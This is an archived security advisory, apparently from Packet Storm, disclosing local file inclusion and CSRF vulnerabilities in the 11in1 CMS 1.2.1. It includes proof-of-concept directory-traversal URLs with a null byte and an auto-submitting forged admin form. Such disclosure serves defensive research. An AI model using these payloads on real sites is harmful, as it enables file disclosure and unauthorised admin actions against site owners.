exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

11in1 1.2.1 Stable 12-31-2011 Cross Site Request Forgery / Local File Inclusion

11in1 1.2.1 Stable 12-31-2011 Cross Site Request Forgery / Local File Inclusion
Posted Feb 16, 2012
Authored by High-Tech Bridge SA | Site htbridge.com

11in1 version 1.2.1 stable 12-31-2011 suffers from cross site request forgery and local file inclusion vulnerabilities.

tags | exploit, local, vulnerability, file inclusion, csrf
SHA-256 | b73da939518492786cd35768a2b3f45cfd2c9d8354440cc70da7cb9b893e9256

11in1 1.2.1 Stable 12-31-2011 Cross Site Request Forgery / Local File Inclusion

Change Mirror Download
Advisory ID: HTB23071
Product: 11in1
Vendor: 11in1
Vulnerable Version(s): 1.2.1 stable 12-31-2011 and probably prior
Tested Version: 1.2.1 stable 12-31-2011
Vendor Notification: 25 January 2012
Public Disclosure: 15 February 2012
Vulnerability Type: Local File Inclusion, Сross-Site Request Forgery (CSRF)
Risk Level: High
Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.ch/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in 11in1, which can be exploited to perform Local File Inclusion and Сross-Site Request Forgery (CSRF) attacks.

1) Local File Inclusion in 11in1: CVE-2012-0996

Input passed via the "class" GET parameter to index.php and /admin/index.php is not properly verified before being used to include local files.
This can be exploited to include local files via directory traversal sequences and URL-encoded NULL bytes.

The following PoC (Proof of Concept) demostrate the vulnerability:

http://[host]/index.php?class=../../../tmp/file%00
http://[host]/admin/index.php?class=../../../tmp/file%00

Successful exploitation of the vulnerabilities requires that "magic_quotes_gpc" is off.

2) Сross-Site Request Forgery (CSRF) in 11in1: CVE-2012-0997

The application allows authorized users to perform certain actions via HTTP requests without making proper validity checks to verify the source of the requests.

An attacker should make logged-in administrator open a malicious link in the browser to exploit this vulnerability.

The following PoC will create a new topic on behalf of website administrator:


<form action="http://[host]/admin/index.php?class=do&action=addTopic" method="post">
<input type="hidden" name="name" value="New Topic Name here">
<input type="hidden" name="sec" value="3">
<input type="hidden" name="content" value="New Topic Content here">
<input type="submit" id="btn">
</form>
<script>
document.getElementById('btn').click();
</script>




-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23071 - https://www.htbridge.ch/advisory/HTB23071 - Multiple vulnerabilities in 11in1.
[2] 11in1 - http://www.11in1.org/ - Eleven In One is an open-source content management system (CMS) that is powered by PHP and MySQL.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close